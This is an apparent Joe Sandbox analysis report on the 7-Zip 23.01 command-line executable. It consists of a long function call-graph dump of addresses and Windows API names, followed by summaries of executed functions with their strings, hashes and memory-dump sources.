4282c8 218 API calls 33981->34231 33982->33958 33982->33978 33983 42b0aa 33988 412350 2 API calls 33983->33988 33987 42ae27 33984->33987 33989 42aee2 33985->33989 33992 42ae3d 33987->33992 34228 4132b0 _CxxThrowException 33987->34228 34003 42b12a 33988->34003 33989->33979 33990 42af91 33993 42af97 free 33990->33993 33994 42afa9 33990->33994 33991->33983 34232 4260f4 VariantClear _CxxThrowException _CxxThrowException 33991->34232 33997 4136a8 3 API calls 33992->33997 33993->33980 33998 42afc6 free 33994->33998 34001 427b1c 14 API calls 33994->34001 34000 42ae6e 33997->34000 33998->33980 33999 42b015 34002 42b01b free 33999->34002 34021 42b02d 33999->34021 34229 43edf0 malloc _CxxThrowException free 34000->34229 34001->33998 34002->33980 34220 41a008 34003->34220 34005 42ae79 34007 4139ac 6 API calls 34005->34007 34009 42ae88 free 34007->34009 34009->33958 34010 42b196 34236 426e88 14 API calls 34010->34236 34012 42b1aa 34016 42b1b0 free 34012->34016 34017 42b1d1 free 34012->34017 34013 42b0ac 34233 417258 50 API calls 34013->34233 34014 42b09d 34018 413798 4 API calls 34014->34018 34015 42b40e 34020 42b4cd 34015->34020 34029 4136a8 3 API calls 34015->34029 34016->33980 34017->33980 34018->33983 34026 42b2a4 free 34020->34026 34038 42b4ee free 34020->34038 34021->33983 34021->34013 34021->34014 34022 42b1f0 34030 42b234 34022->34030 34031 42b33b 34022->34031 34025 42b0b9 34027 42b105 34025->34027 34028 42b0bd 34025->34028 34026->33980 34032 427b1c 14 API calls 34027->34032 34234 4195e0 GetLastError 34028->34234 34044 42b43a 34029->34044 34041 42b26c free 34030->34041 34049 42b278 34030->34049 34060 42b28c 34030->34060 34031->34015 34033 4199cc 6 API calls 34031->34033 34036 42b10d free 34032->34036 34037 42b37d 34033->34037 34035 42b0c2 34235 426f80 13 API calls 34035->34235 34036->33980 34040 42b3bf 34037->34040 34237 426e88 14 API calls 34037->34237 34038->33980 34223 419784 34040->34223 34041->34049 34043 412350 2 API calls 34043->34026 34047 42b49c 34044->34047 34239 427e80 7 API calls 34044->34239 34046 42b0dd 34054 42b0e3 free 34046->34054 34055 42b0f5 free 34046->34055 34051 42b4c3 free 34047->34051 34058 413798 4 API calls 34047->34058 34053 412350 2 API calls 34049->34053 34049->34060 34051->34020 34052 42b398 34052->34040 34059 42b39e free 34052->34059 34053->34060 34054->33980 34055->33980 34062 42b4c2 34058->34062 34059->33980 34060->34043 34062->34051 34064 42b3e7 34064->34015 34065 42b3ed free 34064->34065 34065->33980 34067->33824 34068->33830 34069->33841 34070->33830 34072 41354c 2 API calls 34071->34072 34074 43efe9 34072->34074 34073 42bb42 34073->33840 34073->33845 34077 4132b0 _CxxThrowException 34073->34077 34074->34073 34075 4139ac 6 API calls 34074->34075 34271 4132b0 _CxxThrowException 34074->34271 34075->34074 34078->33858 34080->33879 34081->33873 34082->33856 34085->33915 34086->33921 34087->33909 34088->33909 34089->33927 34090->33927 34091->33922 34093 4270fb 34092->34093 34094 42710e 34093->34094 34095 427101 34093->34095 34097 41be6c VariantClear 34094->34097 34096 41be6c VariantClear 34095->34096 34098 42716a 34096->34098 34100 42717b 34097->34100 34098->33942 34098->33943 34099 4271af 34102 41be6c VariantClear 34099->34102 34100->34099 34101 4271bc 34100->34101 34103 41be6c VariantClear 34101->34103 34102->34098 34104 4271f1 34103->34104 34240 426d18 VariantClear 34104->34240 34106 427208 34106->34098 34241 426d18 VariantClear 34106->34241 34108 427223 34108->34098 34242 426d18 VariantClear 34108->34242 34111 42a802 34110->34111 34113 42a834 34111->34113 34243 43f078 17 API calls 34111->34243 34114 42a98c 34113->34114 34115 4136a8 3 API calls 34113->34115 34114->33947 34116 42a852 34115->34116 34244 43edf0 malloc _CxxThrowException free 34116->34244 34118 42a85d 34119 42a8c3 34118->34119 34120 42a86a 34118->34120 34132 42a890 34119->34132 34245 41553c wcscmp 34119->34245 34121 455a44 5 API calls 34120->34121 34124 42a876 34121->34124 34122 42a957 34126 4139ac 6 API calls 34122->34126 34127 412350 2 API calls 34124->34127 34125 42a8d5 34131 455a44 5 API calls 34125->34131 34125->34132 34129 42a981 free 34126->34129 34130 42a87e 34127->34130 34129->34114 34130->34132 34134 41354c 2 API calls 34130->34134 34133 42a8e5 34131->34133 34132->34122 34246 4132b0 _CxxThrowException 34132->34246 34135 412350 2 API calls 34133->34135 34134->34132 34136 42a8ef 34135->34136 34136->34132 34137 41354c 2 API calls 34136->34137 34137->34132 34139 4272bd 34138->34139 34140 41354c 2 API calls 34139->34140 34141 4272ca 34140->34141 34142 4188ec 102 API calls 34141->34142 34143 4272db 34142->34143 34149 4275f9 34143->34149 34150 4272e5 34143->34150 34144 4272eb 34145 4275e5 free 34144->34145 34147 4276b5 34145->34147 34146 42744b 34151 427490 34146->34151 34152 427451 34146->34152 34147->33974 34147->33975 34148 4276a3 free 34148->34147 34149->34148 34156 4136a8 3 API calls 34149->34156 34150->34144 34150->34146 34258 425f40 malloc _CxxThrowException memmove 34150->34258 34153 427562 34151->34153 34154 42749a 34151->34154 34259 41e70c 106 API calls 34152->34259 34159 427570 34153->34159 34160 42759c 34153->34160 34158 4136a8 3 API calls 34154->34158 34179 427629 34156->34179 34164 4274a7 34158->34164 34266 417088 48 API calls 34159->34266 34268 419164 103 API calls 34160->34268 34161 427459 34166 427484 34161->34166 34167 42745d 34161->34167 34163 427312 34170 4134d0 4 API calls 34163->34170 34261 41e70c 106 API calls 34164->34261 34166->34148 34260 426e00 7 API calls 34167->34260 34169 4275a4 34169->34148 34173 4275ac 34169->34173 34174 427328 free 34170->34174 34172 427578 34172->34148 34176 427580 34172->34176 34269 417474 56 API calls 34173->34269 34185 4273a7 34174->34185 34175 4274b2 34180 4274b6 34175->34180 34181 4274f5 34175->34181 34267 426e88 14 API calls 34176->34267 34184 41354c 2 API calls 34179->34184 34262 426e00 7 API calls 34180->34262 34263 417130 50 API calls 34181->34263 34183 4275b4 34183->34148 34188 4275bc GetLastError 34183->34188 34189 427657 34184->34189 34190 4273c1 34185->34190 34191 4273ae free 34185->34191 34187 427502 34193 427553 free 34187->34193 34194 427506 34187->34194 34188->34148 34195 4275cb 34188->34195 34196 4188ec 102 API calls 34189->34196 34199 427441 free 34190->34199 34200 42740a 34190->34200 34204 4273d4 34190->34204 34205 42742a free 34190->34205 34191->34145 34192 4274c8 34197 4274e0 free 34192->34197 34198 4274ce free 34192->34198 34193->34148 34264 4195e0 GetLastError 34194->34264 34270 426e88 14 API calls 34195->34270 34203 42766d 34196->34203 34197->34145 34198->34145 34199->34146 34200->34199 34208 42768b free free 34203->34208 34247 416fcc 34203->34247 34209 427413 free 34204->34209 34210 4273d8 34204->34210 34205->34145 34206 42750b 34265 426f80 13 API calls 34206->34265 34207 4275dd 34207->34145 34208->34148 34209->34145 34210->34200 34213 4273dc 34210->34213 34216 4273e0 free 34213->34216 34217 4273f5 free 34213->34217 34214 427526 34218 42753e free 34214->34218 34219 42752c free 34214->34219 34216->34145 34217->34145 34218->34145 34219->34145 34221 419a94 48 API calls 34220->34221 34222 41a02a 34221->34222 34222->34010 34222->34022 34224 4196f8 5 API calls 34223->34224 34225 4197a0 34224->34225 34225->34015 34238 426e88 14 API calls 34225->34238 34226->33949 34227->33954 34229->34005 34230->33967 34231->33990 34232->33999 34233->34025 34234->34035 34235->34046 34236->34012 34237->34052 34238->34064 34239->34047 34240->34106 34241->34108 34242->34098 34243->34113 34244->34118 34245->34125 34248 416fe7 34247->34248 34249 417001 34248->34249 34250 416fee SetFileAttributesW 34248->34250 34251 416ffd 34249->34251 34252 41354c 2 API calls 34249->34252 34250->34249 34250->34251 34251->34208 34253 41700f 34252->34253 34254 41b8b0 44 API calls 34253->34254 34255 417024 34254->34255 34256 417048 free 34255->34256 34257 417028 SetFileAttributesW free 34255->34257 34256->34251 34257->34251 34258->34163 34259->34161 34260->34144 34261->34175 34262->34192 34263->34187 34264->34206 34265->34214 34266->34172 34267->34144 34268->34169 34269->34183 34270->34207 34272 453616 34273 45362c 34272->34273 34363 43c944 34273->34363 34276 413798 4 API calls 34277 4536e4 34276->34277 34278 453725 34277->34278 34279 453953 34277->34279 34280 453a40 free free 34278->34280 34281 45372d 34278->34281 34282 413798 4 API calls 34279->34282 34284 43ca94 7 API calls 34280->34284 34366 44b3b4 34281->34366 34283 4539b6 34282->34283 34286 413798 4 API calls 34283->34286 34303 453894 34284->34303 34288 4539c7 34286->34288 34292 413798 4 API calls 34288->34292 34289 453aa3 free free 34291 43ca94 7 API calls 34289->34291 34290 453749 34293 455a44 5 API calls 34290->34293 34291->34303 34294 4539d8 free free 34292->34294 34295 453751 34293->34295 34296 43ca94 7 API calls 34294->34296 34297 412350 2 API calls 34295->34297 34296->34303 34298 45375b 34297->34298 34299 453775 free free 34298->34299 34375 44b8e4 malloc _CxxThrowException memmove 34298->34375 34372 43ca94 7 API calls 34299->34372 34306 453395 34307 4533b9 memmove 34306->34307 34308 45339a memmove 34306->34308 34307->34303 34309 4533dd memmove 34307->34309 34308->34309 34310 4533fd 34309->34310 34336 44aec4 34310->34336 34313 413798 4 API calls 34314 453427 34313->34314 34315 413798 4 API calls 34314->34315 34316 453438 34315->34316 34351 452a28 34316->34351 34318 453453 34319 45345d 34318->34319 34320 4537f8 34318->34320 34322 455a44 5 API calls 34319->34322 34321 453886 34320->34321 34323 413798 4 API calls 34320->34323 34325 43ca94 7 API calls 34321->34325 34324 453465 34322->34324 34326 453864 34323->34326 34327 412350 2 API calls 34324->34327 34325->34303 34328 413798 4 API calls 34326->34328 34329 45346f 34327->34329 34330 453875 34328->34330 34331 453489 34329->34331 34374 44b8e4 malloc _CxxThrowException memmove 34329->34374 34332 413798 4 API calls 34330->34332 34334 43ca94 7 API calls 34331->34334 34332->34321 34335 4534ae 34334->34335 34337 41354c 2 API calls 34336->34337 34338 44af12 34337->34338 34339 41354c 2 API calls 34338->34339 34340 44af1c 34339->34340 34341 41354c 2 API calls 34340->34341 34342 44af26 34341->34342 34343 41354c 2 API calls 34342->34343 34344 44af6e 34343->34344 34345 41354c 2 API calls 34344->34345 34346 44af78 34345->34346 34347 41354c 2 API calls 34346->34347 34348 44afae 34347->34348 34349 41354c 2 API calls 34348->34349 34350 44afb8 34349->34350 34350->34313 34352 452a55 34351->34352 34353 452a8f 34351->34353 34354 412350 2 API calls 34352->34354 34355 412350 2 API calls 34353->34355 34362 452a5d 34353->34362 34354->34362 34356 452aa0 34355->34356 34357 413798 4 API calls 34356->34357 34358 452adb 34357->34358 34359 419fc4 64 API calls 34358->34359 34360 452af0 34359->34360 34360->34362 34376 4195e0 GetLastError 34360->34376 34362->34318 34364 41354c 2 API calls 34363->34364 34365 43c9c3 memmove 34364->34365 34365->34276 34367 44b419 34366->34367 34370 41bf00 VariantClear 34367->34370 34371 44b41f 34367->34371 34368 41be6c VariantClear 34369 44b4ea 34368->34369 34369->34289 34369->34290 34370->34371 34371->34368 34373 43cafe memmove 34372->34373 34373->34306 34374->34331 34375->34299 34376->34362 34377 46ae51 34378 46aef6 34377->34378 34381 45fdd4 SetConsoleCtrlHandler 34378->34381 34382 452732 34383 45295a 34382->34383 34384 45273e 34382->34384 34384->34383 34420 44a110 VariantClear 34384->34420 34386 4527a4 34386->34383 34421 44a110 VariantClear 34386->34421 34388 4527be 34388->34383 34422 44a110 VariantClear 34388->34422 34390 4527d8 34390->34383 34423 44a110 VariantClear 34390->34423 34392 4527f2 34392->34383 34424 44a110 VariantClear 34392->34424 34394 45280c 34394->34383 34425 44a110 VariantClear 34394->34425 34396 452826 34396->34383 34397 415110 3 API calls 34396->34397 34398 45283d 34397->34398 34399 41354c 2 API calls 34398->34399 34401 452848 34399->34401 34400 452872 34403 452945 free free 34400->34403 34404 4528a0 34400->34404 34405 4528fc 34400->34405 34401->34400 34402 413730 4 API calls 34401->34402 34402->34400 34403->34383 34407 41354c 2 API calls 34404->34407 34427 447e60 CharUpperW CharUpperW 34405->34427 34409 4528aa 34407->34409 34408 452909 34428 4383c4 10 API calls 34408->34428 34411 41354c 2 API calls 34409->34411 34413 4528b7 34411->34413 34412 45292d 34415 413798 4 API calls 34412->34415 34426 4383c4 10 API calls 34413->34426 34417 452939 free 34415->34417 34416 4528cd 34418 413798 4 API calls 34416->34418 34417->34403 34419 4528d9 free free free 34418->34419 34419->34403 34420->34386 34421->34388 34422->34390 34423->34392 34424->34394 34425->34396 34426->34416 34427->34408 34428->34412 34429 453d32 34451 452e58 34429->34451 34431 41354c 2 API calls 34433 453d66 34431->34433 34432 453d3a 34432->34431 34434 41354c 2 API calls 34433->34434 34435 453d71 34434->34435 34439 453dc5 34435->34439 34458 41768c 34435->34458 34441 453df2 free free 34439->34441 34448 453e0d 34439->34448 34443 453ebf 34441->34443 34442 453daa free free 34442->34443 34444 453ea7 free free 34444->34443 34445 4134d0 4 API calls 34445->34448 34446 455a44 5 API calls 34446->34448 34447 412350 2 API calls 34447->34448 34448->34444 34448->34445 34448->34446 34448->34447 34449 4136a8 3 API calls 34448->34449 34450 453e71 free 34448->34450 34449->34448 34450->34448 34452 41354c 2 API calls 34451->34452 34453 452edc 34452->34453 34454 41354c 2 API calls 34453->34454 34455 452ee9 34454->34455 34456 41354c 2 API calls 34455->34456 34457 452f02 34456->34457 34457->34432 34459 4176a5 34458->34459 34460 4176b7 34459->34460 34461 413730 4 API calls 34459->34461 34462 413730 4 API calls 34460->34462 34461->34460 34463 4176d1 34462->34463 34464 42cf90 34463->34464 34478 42cc64 34464->34478 34466 42cfcd 34467 42d004 34466->34467 34469 42cff0 free free 34466->34469 34468 413798 4 API calls 34467->34468 34470 42d02d 34468->34470 34469->34466 34471 4134d0 4 API calls 34470->34471 34472 42d03e 34471->34472 34473 4188ec 102 API calls 34472->34473 34474 42d051 free 34473->34474 34475 42d064 34474->34475 34476 42d069 34474->34476 34483 4195e0 GetLastError 34475->34483 34476->34439 34476->34442 34479 42ccb5 34478->34479 34480 42cc7b 34478->34480 34479->34466 34480->34479 34481 42cc92 free 34480->34481 34482 42cca9 free 34480->34482 34481->34480 34481->34482 34482->34480 34483->34476 34484 44841c 34485 448486 34484->34485 34486 44843c 34484->34486 34486->34485 34487 448468 free 34486->34487 34488 416b80 FreeLibrary 34487->34488 34489 44847a free 34488->34489 34489->34486 34490 426b58 34491 426b88 34490->34491 34492 426b79 34490->34492 34492->34491 34494 460284 EnterCriticalSection 34492->34494 34495 4602b5 LeaveCriticalSection 34494->34495 34496 4602a8 34494->34496 34495->34491 34498 46b774 34496->34498 34499 46b794 GetTickCount 34498->34499 34500 46b79d 34498->34500 34499->34500 34503 46b7cf strcmp 34500->34503 34511 46b805 34500->34511 34536 46ba72 34500->34536 34504 46b7e4 34503->34504 34503->34511 34506 46b7ef wcscmp 34504->34506 34504->34511 34505 46b870 34508 412ecc 3 API calls 34505->34508 34506->34511 34507 46b858 strcmp 34507->34505 34507->34536 34510 46b87f 34508->34510 34509 46b8a7 34512 46b8c1 34509->34512 34513 413cec _CxxThrowException 34509->34513 34510->34509 34562 413cec 34510->34562 34511->34536 34545 46b56c 34511->34545 34514 46b9db 34512->34514 34523 413cec _CxxThrowException 34512->34523 34516 46b8b5 34513->34516 34517 46b9f4 34514->34517 34518 46b9e3 strcmp 34514->34518 34570 412ff8 malloc _CxxThrowException memmove free _CxxThrowException 34516->34570 34553 46b4d0 34517->34553 34518->34517 34521 46ba32 34518->34521 34524 412ecc 3 API calls 34521->34524 34527 46b8e2 34523->34527 34528 46ba62 34524->34528 34531 413798 4 API calls 34527->34531 34532 413798 4 API calls 34528->34532 34529 46ba26 34534 412ecc 3 API calls 34529->34534 34530 46ba1a 34574 4124a8 fflush 34530->34574 34535 46b8ef 34531->34535 34532->34536 34534->34521 34537 4124e4 10 API calls 34535->34537 34536->34495 34543 46b913 34537->34543 34538 46b9b3 34573 412ff8 malloc _CxxThrowException memmove free _CxxThrowException 34538->34573 34540 413798 4 API calls 34540->34543 34543->34538 34543->34540 34544 4124e4 10 API calls 34543->34544 34571 413c68 memmove 34543->34571 34572 413ec0 6 API calls 34543->34572 34544->34543 34546 46b586 34545->34546 34547 46b5ba strlen 34546->34547 34548 46b5ed 34547->34548 34549 46b5db 34547->34549 34550 412fac 5 API calls 34548->34550 34549->34548 34551 413cec _CxxThrowException 34549->34551 34552 46b5fb 34550->34552 34551->34549 34552->34505 34552->34507 34554 46b540 34553->34554 34555 46b4ea 34553->34555 34557 46b551 fputs 34554->34557 34576 4124a8 fflush 34554->34576 34556 46b4fb 34555->34556 34575 412c70 malloc _CxxThrowException _CxxThrowException free 34555->34575 34559 46b51d fputs 34556->34559 34560 46b50d memset 34556->34560 34557->34529 34557->34530 34559->34554 34560->34559 34563 413d02 34562->34563 34564 413cfd 34562->34564 34566 412fac 34563->34566 34577 412cf8 _CxxThrowException 34564->34577 34567 412fc1 34566->34567 34578 412d4c 34567->34578 34570->34512 34571->34543 34572->34543 34573->34514 34574->34529 34575->34556 34576->34557 34579 412d98 34578->34579 34580 412d5d 34578->34580 34579->34509 34581 412d9d _CxxThrowException 34580->34581 34582 412d93 34580->34582 34584 412c2c malloc _CxxThrowException memmove free 34582->34584 34584->34579 34585 422978 34586 4229d7 34585->34586 34587 42299b 34585->34587 34587->34586 34589 41f148 34587->34589 34598 41f168 34589->34598 34590 41f30b 34592 41f34f GetLastError 34590->34592 34594 41f195 34590->34594 34591 41f2c2 34593 41f2ce memmove 34591->34593 34591->34594 34592->34594 34593->34594 34594->34587 34595 41f28f 34595->34590 34601 4196f8 5 API calls 34595->34601 34596 4196f8 5 API calls 34596->34598 34597 41f24a 34597->34598 34604 41f348 34597->34604 34606 46d880 VirtualAlloc 34597->34606 34598->34590 34598->34591 34598->34594 34598->34595 34598->34596 34598->34597 34602 41f2b1 GetLastError 34598->34602 34605 4197b8 ReadFile 34598->34605 34603 41f2ad 34601->34603 34602->34594 34603->34590 34603->34602 34604->34594 34605->34598 34606->34597 34607 469dfd 34608 469e01 fputs 34607->34608 34609 469e19 34607->34609 34763 4124c4 fputc 34608->34763 34764 45fde4 34609->34764 34613 41354c 2 API calls 34614 469e65 34613->34614 34768 43c0c8 34614->34768 34763->34609 34765 45fe02 34764->34765 34766 45fdf2 34764->34766 34765->34613 34831 412e68 malloc _CxxThrowException free 34766->34831 34832 439be0 34768->34832 34773 43c159 34845 43c044 13 API calls 34773->34845 34775 43c221 34847 43c044 13 API calls 34775->34847 34784 455a44 5 API calls 34787 43c172 34784->34787 34787->34775 34787->34784 34789 412350 2 API calls 34787->34789 34795 4136a8 3 API calls 34787->34795 34797 43c1eb free 34787->34797 34846 438c88 6 API calls 34787->34846 34789->34787 34795->34787 34797->34787 34831->34765 34848 426830 GetCurrentProcess 34832->34848 34835 43bf1c 34843 43bf4d 34835->34843 34844 43bff9 34835->34844 34837 43c008 34964 438ecc 176 API calls 34837->34964 34839 43bffb memmove 34839->34773 34839->34787 34840 439b28 9 API calls 34840->34843 34843->34840 34843->34844 34858 43ab24 34843->34858 34963 438d00 10 API calls 34844->34963 34846->34787 34849 426851 CloseHandle 34848->34849 34850 426867 OpenProcessToken 34848->34850 34849->34850 34851 4268c9 34850->34851 34852 42687e LookupPrivilegeValueW 34850->34852 34855 4268d3 CloseHandle 34851->34855 34857 4268d9 34851->34857 34852->34851 34853 4268ab AdjustTokenPrivileges 34852->34853 34853->34851 34854 4268dd GetLastError 34853->34854 34856 4268f2 CloseHandle 34854->34856 34854->34857 34855->34857 34856->34857 34857->34835 34859 43ab71 34858->34859 34965 438494 34859->34965 34861 43bd0e free 34861->34839 34861->34843 34862 43bb53 34997 439d70 84 API calls 34862->34997 34864 43bb72 34873 43bb79 34864->34873 34890 43bbc0 34864->34890 34865 43b94b 34995 419414 15 API calls 34865->34995 34866 43b84d 34868 43b8a8 free 34866->34868 34867 43ab93 34867->34861 34884 43b8bc 34867->34884 34956 43abff 34867->34956 34868->34861 34869 4134d0 4 API calls 34869->34956 34871 43bd04 free 34871->34861 34872 43bbbb 34872->34871 34873->34871 34873->34872 34874 43bba6 free free 34873->34874 34874->34873 34876 43ba65 34878 43bac1 34876->34878 34885 43bb2c free free 34876->34885 34877 4134d0 4 API calls 34923 43b3c0 34877->34923 34881 43bb42 free 34878->34881 34879 43bc58 34879->34872 34880 43bce9 free free 34879->34880 34880->34879 34881->34861 34882 4136a8 3 API calls 34911 43b964 34882->34911 34883 43bc5d 34883->34872 34891 43bc7a free free 34883->34891 34884->34862 34884->34865 34885->34876 34886 41354c 2 API calls 34886->34956 34888 43bac3 free 34888->34878 34894 43bad8 34888->34894 34889 41354c 2 API calls 34889->34923 34890->34879 34890->34883 34892 438494 32 API calls 34890->34892 34896 43bc94 34890->34896 34998 43a43c 334 API calls 34890->34998 34891->34883 34892->34890 34894->34878 34895 43baf1 free free 34894->34895 34895->34894 34896->34872 34904 43bcb1 free free 34896->34904 34898 41354c 2 API calls 34898->34911 34900 413798 4 API calls 34900->34956 34902 4384c8 9 API calls 34902->34923 34903 43ad48 GetLastError 34903->34956 34904->34896 34905 413798 4 API calls 34905->34923 34906 413798 4 API calls 34906->34911 34908 4383ec 102 API calls 34908->34923 34911->34876 34911->34882 34911->34888 34911->34898 34911->34906 34914 43ba6a free free 34911->34914 34915 43ba39 free free 34911->34915 34996 43a43c 334 API calls 34911->34996 34912 43b3d4 free free 34912->34868 34913 43ad69 free free 34913->34956 34914->34881 34917 43ba93 34914->34917 34915->34876 34915->34911 34916 43b7f0 free 34918 43b802 free free 34916->34918 34919 43b888 free free 34916->34919 34917->34878 34927 43baac free free 34917->34927 34918->34923 34919->34868 34920 43b3f2 free free 34920->34868 34921 43ade8 free free 34921->34956 34922 412350 malloc _CxxThrowException 34922->34956 34923->34866 34923->34877 34923->34889 34923->34902 34923->34905 34923->34908 34923->34916 34924 43b692 free free 34923->34924 34925 43b6b6 GetLastError 34923->34925 34926 43b7dc free free 34923->34926 34928 43b738 free free 34923->34928 34929 43b86d free free 34923->34929 34930 43b852 free free 34923->34930 34931 43b6d6 free free 34923->34931 34992 4136dc malloc _CxxThrowException free 34923->34992 34993 4132b0 _CxxThrowException 34923->34993 34994 439f08 334 API calls 34923->34994 34924->34923 34925->34923 34926->34923 34927->34917 34928->34923 34929->34868 34930->34868 34931->34923 34933 43aeb7 free free free 34933->34956 34934 43af22 free 34934->34956 34935 43aea2 free free 34935->34956 34936 43af0c free free 34936->34956 34937 43b12f free free 34937->34956 34941 43b410 free free 34941->34868 34943 455a44 malloc _CxxThrowException _CxxThrowException memmove free 34943->34956 34944 43b42e free free 34944->34868 34946 43b24c free free free 34946->34956 34948 43affd free free 34948->34956 34949 43b237 free free 34949->34956 34950 43b4a5 34951 43b4e6 free free free 34950->34951 34953 43b4d1 free free 34950->34953 34951->34868 34952 43b364 free free free 34952->34956 34953->34950 34954 43b34f free free 34954->34956 34955 4136a8 malloc _CxxThrowException memmove 34955->34956 34956->34869 34956->34886 34956->34900 34956->34903 34956->34912 34956->34913 34956->34920 34956->34921 34956->34922 34956->34923 34956->34933 34956->34934 34956->34935 34956->34936 34956->34937 34956->34941 34956->34943 34956->34944 34956->34946 34956->34948 34956->34949 34956->34950 34956->34952 34956->34954 34956->34955 34958 43b44c 34956->34958 34959 43b10c free 34956->34959 34962 43b0f3 free free 34956->34962 34969 4384c8 34956->34969 34977 4383ec 34956->34977 34982 4136dc malloc _CxxThrowException free 34956->34982 34983 4132b0 _CxxThrowException 34956->34983 34984 415e24 18 API calls 34956->34984 34985 4387c4 16 API calls 34956->34985 34986 439a20 7 API calls 34956->34986 34987 438930 61 API calls 34956->34987 34988 43a000 95 API calls 34956->34988 34989 4153d0 CharUpperW CharUpperW 34956->34989 34990 42c850 malloc _CxxThrowException _CxxThrowException memmove free 34956->34990 34991 439f08 334 API calls 34956->34991 34960 43b47b free free free 34958->34960 34961 43b467 free free 34958->34961 34959->34956 34960->34868 34961->34958 34962->34956 34963->34837 34964->34839 34966 4384a8 34965->34966 34967 4384bc 34965->34967 34999 45fe08 34966->34999 34967->34867 34970 4136a8 3 API calls 34969->34970 34971 4384e7 34970->34971 34972 4139ac 6 API calls 34971->34972 34973 4384f5 34972->34973 34975 43850b 34973->34975 35005 4132b0 _CxxThrowException 34973->35005 34976 43855a free 34975->34976 34976->34956 34978 4188ec 102 API calls 34977->34978 34979 438402 34978->34979 34980 438459 34979->34980 34981 413730 4 API calls 34979->34981 34980->34956 34981->34980 34982->34956 34984->34956 34985->34956 34986->34956 34987->34956 34988->34956 34989->34956 34990->34956 34991->34956 34992->34923 34994->34923 34995->34911 34996->34911 34997->34864 34998->34890 35000 45fe46 34999->35000 35001 45fe18 34999->35001 35000->34967 35002 413798 4 API calls 35001->35002 35003 45fe3e 35002->35003 35004 46b774 32 API calls 35003->35004 35004->35000

                                Executed Functions

                                Function 00468806 Relevance: 153.2, APIs: 74, Strings: 13, Instructions: 907COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 00468815
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • GetStdHandle.KERNEL32 ref: 004688BE
                                • GetConsoleScreenBufferInfo.KERNELBASE ref: 004688CF
                                • _CxxThrowException.MSVCRT ref: 00468A08
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputcfputs
                                • String ID: 7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20$ || $ : $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$Libs:$Unsupported archive type$offset=$wudn
                                • API String ID: 3360184521-3863618374
                                • Opcode ID: 5560867a0da503c677f0d4b6f5028a4d00209056cddc71ea0216c80371a3413d
                                • Instruction ID: f8d32fa580d87320b321fa6ab503c5d7737f7f4df6618ef15f5379672ebbebca
                                • Opcode Fuzzy Hash: 5560867a0da503c677f0d4b6f5028a4d00209056cddc71ea0216c80371a3413d
                                • Instruction Fuzzy Hash: 718282B6308A8186DB24EF26E49039E7361F785B88F40411BDB8E47B59DF7CC949C749
                                Function 0043AB24 Relevance: 111.1, APIs: 88, Instructions: 1120COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrow$ErrorLastmemmove$malloc
                                • String ID:
                                • API String ID: 707025802-0
                                • Opcode ID: 52c1df7397043974769d64c47c4ad03f3668cbe00846540f0b514377cd4b960e
                                • Instruction ID: 774466f5da32a8faa8f3691c365cbc9b4be7c15cd1b7f3d3ea42a450deff4665
                                • Opcode Fuzzy Hash: 52c1df7397043974769d64c47c4ad03f3668cbe00846540f0b514377cd4b960e
                                • Instruction Fuzzy Hash: 74929F32644B8886CB20EB22E5903AEA361F7C9B84F546117DF9D57B19DF7CC891CB48
                                Function 0043DD64 Relevance: 92.4, APIs: 59, Strings: 2, Instructions: 860COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ErrorLastmemset
                                • String ID: Cannot find archive file$The item is a directory
                                • API String ID: 4217778428-1569138187
                                • Opcode ID: 5af5bbfc515d3b7441938e7c71afb3910a4a027ab430430eb7bb26be87f64f2f
                                • Instruction ID: f2f5bb066131f1f5d0b4c39b7a4567a7ac087bcd968eba5d65f3311795ab55e3
                                • Opcode Fuzzy Hash: 5af5bbfc515d3b7441938e7c71afb3910a4a027ab430430eb7bb26be87f64f2f
                                • Instruction Fuzzy Hash: 4C728E33249BC986CB30EB26E49429EA361F7C9B84F145116DE9E87B59DF3CC591CB08
                                Function 0043D078 Relevance: 84.7, APIs: 55, Strings: 1, Instructions: 666COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Cannot create output directory, xrefs: 0043D7A2
                                Memory Dump Source
